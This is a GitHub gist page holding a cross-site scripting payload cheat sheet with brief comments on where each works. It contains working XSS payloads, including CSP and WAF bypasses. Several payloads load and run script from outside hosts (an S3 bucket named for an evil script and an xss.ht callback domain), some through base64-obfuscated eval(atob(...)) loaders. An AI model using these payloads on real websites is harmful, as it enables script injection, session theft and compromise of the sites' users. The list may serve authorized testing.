Last active
October 11, 2020 19:02
-
-
Save Uyavuz24/9bc49b8b5de3a1e8e5ce8219226deb90 to your computer and use it in GitHub Desktop.
there are also descriptions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<iframe srcdoc='<script src=https://myeviljsbucket.s3.amazonaws.com/evilscript.js></script>'></iframe> //When CSP disallows inline js but it allows s3 buckets. "<script>" tag doens't work but there is HTML injection!! | |
<svg/onload=alert(1)> //this is everywhere | |
<img src=x onerror=alert(document.domain)> //this is also everywhere | |
"><script src=https://ubey.xss.ht></script> | |
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://ubey.xss.ht\';document.body.appendChild(a)') //For use where URI's are taken as input. | |
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> //For bypassing poorly designed blacklist systems with the HTML5 autofocus attribute. | |
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> //Another basic payload for when <script> tags are explicitly filtered. | |
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWJleS54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7> //HTML5 payload, only works in Firefox, Chrome and Opera | |
"><iframe srcdoc="<script>var a=parent.document.createElement("script");a.src="https://ubey.xss.ht";parent.document.body.appendChild(a);</script>"> | |
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//ubey.xss.ht");a.send();</script> //For exploitation of web applications with Content Security Policies containing script-src but have unsafe-inline enabled. | |
<script>$.getScript("//ubey.xss.ht")</script> // Example payload for sites that include JQuery | |
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e | |
<!<script>alert(1)</script> //AWS WAF | |
<h2 | |
<h2> | |
"test | |
'test | |
<h2? | |
<%0dh2 | |
</script/x> | |
<sCriPt> | |
!'+%&/()=?_-<|>" | |
fileformat.info unicode chars, hex, encoded |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment